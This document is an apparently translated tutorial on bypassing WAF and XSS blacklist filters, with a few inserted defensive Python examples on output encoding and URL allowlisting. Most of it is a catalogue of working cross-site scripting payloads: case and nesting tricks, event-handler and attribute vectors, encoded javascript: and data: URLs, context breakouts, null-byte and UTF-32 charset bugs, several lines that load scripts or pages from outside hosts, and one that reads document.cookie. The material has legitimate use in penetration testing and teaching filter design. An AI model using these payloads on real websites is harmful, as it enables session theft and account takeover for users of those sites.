Test Methods for Bypassing XSS Filtering

Source: Internet
Author: User

0x00 Background

This article is taken from the "Bypassing XSS Filters" section of Modern Web Application Firewalls: Fingerprinting and Bypassing XSS Filters. The earlier part of that paper, which identifies a WAF from its fingerprint, is skipped here; instead we walk through some basic test procedures for XSS. Although the tests are run against a WAF, the bypasses rely on defects in the WAF's regular expressions rather than on anything protocol-specific, so they apply equally to other XSS filtering scenarios. The aim is to give newcomers a quick grounding in basic methods for testing XSS.


0x01 Bypassing the blacklist

In most places a blacklist is used as the filter. There are three ways to test for a blacklist bypass:

1. Brute-force testing (send a large number of payloads and inspect the responses)
2. Reason about the filter's regular expressions and craft input around them
3. Use browser bugs

Preliminary test

1) Insert a normal HTML tag, for example <B>, <I>, <u>, and check whether the returned page HTML-encodes it or filters the tag out.

2) Insert an unclosed tag, for example <B, <I, <u, <marquee, and check whether the response filters out the opened tag.

3) Then test a few XSS payloads. Practically every XSS filter will block these:

<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<script src="http://rhainfosec.com/evil.js">

Check whether the whole response is filtered or only part of it, whether the alert, prompt and confirm strings are left intact, and try a mix of upper and lower case:

<scRiPt>alert(1);</scrIPt>

4) If the filter only removes the <script> and </script> tags, you can use

<scr<script>ipt>alert(1)</scr<script>ipt>

When the inner <script> tags are stripped in a single pass, the remaining fragments join up into a complete payload.
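Why the nested-tag trick works, as an added example that is not part of the original article: a constructed single-pass strip rule of the kind a naive WAF uses, beside a fixpoint version that repeats until nothing changes. Function names are chosen here; the real fix is output encoding rather than tag removal.

```python
import re

# Constructed example (not from the article) of a blacklist rule as a naive filter
# might write it: remove <script ...> and </script>, case-insensitively.
SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def naive_strip(value: str) -> str:
    """Single pass: each match is deleted exactly once. Deleting the inner <script>
    of <scr<script>ipt> joins the surrounding fragments into a fresh <script>
    that the filter never looks at again."""
    return SCRIPT_TAG.sub("", value)


def fixpoint_strip(value: str) -> str:
    """Repeat until the input stops changing, so fragments re-joined by a deletion
    are caught on the next round. This closes the nesting hole, but the rule still
    only knows about one tag; event handlers on other tags pass straight through,
    which is why encoding output is the robust choice, not removing markup."""
    while True:
        stripped = SCRIPT_TAG.sub("", value)
        if stripped == value:
            return stripped
        value = stripped
```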

5) Use an <a href tag to test the response.

<a href="http://www.google.com">Clickme</a>

Is the <a tag filtered out?
Is href filtered?
Is the data inside href filtered?

If nothing is filtered, insert the javascript: protocol:

<a href="javascript:alert(1)">Clickme</a>

Is an error returned?
Is the entire javascript: URL filtered out, or only the string "javascript"?
Try mixed case.

Continue the test with event handlers that execute JavaScript:

<a href="rhainfosec.com" onmouseover=alert(1)>ClickHere</a>

Check whether the onmouseover event is filtered. Then test a non-existent event to learn the filtering rule:

<a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a>

Does the response come back complete, or is it killed like onmouseover?

If it comes back complete, the filter implements an event blacklist. HTML5 offers more than 150 event handlers that execute JavaScript, so test the rarer ones:

<body/onhashchange=alert(1)><a href=#>clickit
Test other tags

Next, test other tags and attributes.

src attribute
<video src=x onerror=prompt(1);>
<audio src=x onerror=prompt(1);>

iframe tag
<iframe src="javascript:alert(2)">
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

embed tag
<embed/src=//goo.gl/nlX0P>

action attribute

Use the action attribute of <form, <isindex and similar tags to execute JavaScript:

<form action="Javascript:alert(1)"><input type=submit>
<isindex action="javascript:alert(1)" type=image>
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
<isindex action=data:text/html, type=image>
<form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK

formaction attribute
<isindex formaction="javascript:alert(1)" type=image>
<input type="image" formaction=JaVaScript:alert(0)>
<form><button formaction=javascript&colon;alert(1)>CLICKME

background attribute
<table background=javascript:alert(1)></table> // valid in Opera 10.5 and IE6

poster attribute
<video poster=javascript:alert(1)//></video> // valid in Opera 10.5 and lower

data attribute
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<object/data=//goo.gl/nlX0P?

code attribute
<applet code="javascript:confirm(document.cookie);"> // valid in Firefox
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

Event handlers
<svg/onload=prompt(1);>
<marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">

Shortest vectors
<q/oncut=open()>
<q/oncut=alert(1)> // useful when the length is restricted

Nesting
<marquee/onstart=confirm(2)>/onstart=confirm(1)>
<body language=vbs onload=alert-1 // valid in IE8
<command onmouseover="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // valid in IE8
When parentheses are filtered

When parentheses are filtered, throw can be used to bypass the filter:

<a onmouseover="javascript:window.onerror=alert;throw 1">

The preceding vectors raise an "uncaught" error in Chrome and IE; the following vector can be used there instead:

<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';>
expression attribute
<div style="color: rgb(''&#0;x:expression(alert(1))"></div> // IE7
<style>#test{x:expression(alert(/XSS/))}</style> // IE7 or lower
location property
<a onmouseover=location='javascript:alert(1)'>click
<body onfocus="location='javascript:alert(1)'">123
Other payloads
<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><image xlink:href="]]></svg>
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
When = ( ) ; : are filtered
<svg><script>alert&#40/1/&#41</script> // works in all browsers

In Opera the tag does not even need to be closed:

<svg><script>alert&#40 1&#41 // works in Opera
Entity encoding

In many cases the WAF encodes user input before it is returned.

JavaScript is a flexible language and accepts many encodings, such as hexadecimal, Unicode and HTML entities. There are rules, however, about where each encoding can be used:

Attributes:

href=
action=
formaction=
location=
on*=
name=
background=
poster=
src=
code=

Supported encodings: HTML entities, octal, decimal, hexadecimal and Unicode

Attribute:

data=

Supported encoding: base64

Context-based filtering

The biggest problem with a WAF is that it does not know the context in which the output lands, so it can be bypassed according to the specific environment.

Input inside an attribute
<input value="XSStest" type=text>

The controllable location is XSStest, which can be used with

">

If that is filtered, replace it with

" autofocus onfocus=alert(1)//

There are many other payloads of this kind:

"onmouseover="prompt(0)x="
"onfocusin=alert(1)autofocusx="
" onfocusout=alert(1) autofocus x="
"onblur=alert(1)autofocusa="
Input inside a script tag

For example:

<script>var x="Input";</script>

The controllable position is Input. You could close the script tag and insert new code, but it is enough to close the double quote and execute JS directly:

";alert(1)//

The final result is

<script>var x="";alert(1)//</script>
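The defensive counterpart to the attribute and script-tag contexts above is context-aware output encoding: the server must encode for the exact place the value lands, which a WAF cannot know. This is an added example (not from the article); the encoder and render function names are chosen here, and the two sinks mirror the ones the article shows.

```python
import html
import json


def encode_for_attribute(value: str) -> str:
    """Context: a double-quoted HTML attribute value. Every " becomes &quot; (and
    & < > ' are encoded too), so the value can never end the attribute or the tag."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Context: a string literal inside <script>. JSON encoding escapes " \\ and control
    characters, so the literal cannot end early; < > & are additionally written as
    \\uXXXX because the HTML parser runs before the JS parser and would otherwise
    treat an embedded </script> as the end of the script block."""
    literal = json.dumps(value)  # includes the surrounding double quotes
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_input(user_value: str) -> str:
    """The <input value="XSStest"> sink from the article, with the encoder applied."""
    return f'<input value="{encode_for_attribute(user_value)}" type=text>'


def render_script(user_value: str) -> str:
    """The <script>var x="Input";</script> sink from the article, with the encoder applied."""
    return f"<script>var x={encode_for_js_string(user_value)};</script>"
```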
Unconventional event listeners

For example:

";document.body.addEventListener("DOMActivate",alert(1))//
";document.body.addEventListener("DOMActivate",prompt(1))//
";document.body.addEventListener("DOMActivate",confirm(1))//

Other events of the same class:

DOMAttrModified
DOMCharacterDataModified
DOMFocusIn
DOMFocusOut
DOMMouseScroll
DOMNodeInserted
DOMNodeInsertedIntoDocument
DOMNodeRemoved
DOMNodeRemovedFromDocument
DOMSubtreeModified
Controllable content in href

For example:

<a href="Userinput">Click</a>

What is controllable is Userinput, so all we need to do is input JavaScript:

javascript:alert(1)//

The final combination is:

<a href="javascript:alert(1)//">Click</a>

Transformations

HTML entity or URL encoding can be used to bypass the blacklist, because the href attribute is automatically decoded. If everything fails, try vbscript (valid in IE10 and earlier) or the data protocol.

JavaScript transformations

Examples for the javascript protocol:

javascript&#00058;alert(1)
javaSCRIPT&colon;alert(1)
JaVaScRipT:alert(1)
javas&Tab;cript:\u0061lert(1);
javascript:\u0061lert&#x28;1&#x29
javascript&#x3A;alert&lpar;document&period;cookie&rpar;

VBScript transformations
vbscript:alert(1);
vbscript&#00058;alert(1);
vbscr&Tab;ipt:alert(1)

Data URL
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
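Because the attribute is entity-decoded and whitespace-stripped before the URL is parsed, a blacklist matched against the raw string cannot keep up with the transformations listed above. The defensive check is to normalise the value the way the browser does and then allowlist the scheme. Added example, not from the article: normalize_href, scheme_of and is_safe_href are names chosen here, and ALLOWED_SCHEMES is a constructed policy.

```python
import html
import re

# Constructed policy for this example: only these schemes may appear in href/src/action.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers remove ASCII tab, LF and CR anywhere in a URL and trim leading/trailing
# C0 control characters and spaces before they look at the scheme.
_INNER_WHITESPACE = re.compile(r"[\t\n\r]")
_EDGE_CONTROLS = re.compile(r"^[\x00-\x20]+|[\x00-\x20]+$")
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.-]*):")


def normalize_href(raw: str) -> str:
    """Approximate the browser's view of an attribute URL: entity-decode first (the
    HTML attribute parser does this, so &Tab; &colon; &#00058; become real characters),
    then apply the URL parser's whitespace and control-character stripping."""
    value = html.unescape(raw)
    value = _INNER_WHITESPACE.sub("", value)
    return _EDGE_CONTROLS.sub("", value)


def scheme_of(url: str):
    """Return the lower-cased scheme, or None for a relative URL."""
    m = _SCHEME.match(url)
    return m.group(1).lower() if m else None


def is_safe_href(raw: str) -> bool:
    """Allowlist check on the normalised URL. Relative URLs carry no scheme and are
    accepted; anything with a scheme must be in ALLOWED_SCHEMES, which rejects
    javascript:, vbscript: and data: however they are cased, encoded or padded."""
    scheme = scheme_of(normalize_href(raw))
    return scheme is None or scheme in ALLOWED_SCHEMES
```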
JSON

When your input lands inside an encodeURIComponent() call, inserting XSS code is easy.

encodeURIComponent('userinput')

The userinput field is controllable. Test code:

-alert(1)-
-prompt(1)-
-confirm(1)-

Final result:

encodeURIComponent("-alert(1)-")
encodeURIComponent("-prompt(1)-")
SVG tags

When the output lands inside an svg tag, there is a special feature.

<svg><script>var myvar="YourInput";</script></svg>

YourInput is controllable.

www.site.com/test.php?var=text";alert(1)//

Even if part of the code is entity-encoded, it still executes:

<svg><script>var myvar="text&quot;;alert(1)//";</script></svg>
Browser bugs

Character-set bugs have appeared many times in IE. The first was UTF-7, but that only works in earlier versions; here we look at one that still executes JavaScript in more recent browsers.

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

On this page we can control the character set of the current page. When we run a regular test:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=">

the double quotation marks come back encoded in the response.

Now set the character set to UTF-32:

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

This version executes successfully in IE9 and earlier.

Bypass with null bytes:

<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

Valid in IE9 and earlier.

For other browser quirks that can be used for XSS, refer to the following article:

http://drops.wooyun.org/tips/147

0x02 Summary

This article mainly lays out a line of thought for testing XSS. It does not list every payload; in fact nobody could. It gives a general framework, and as you work through a target you can gradually add your own payloads on top of it. Progress will surely follow.
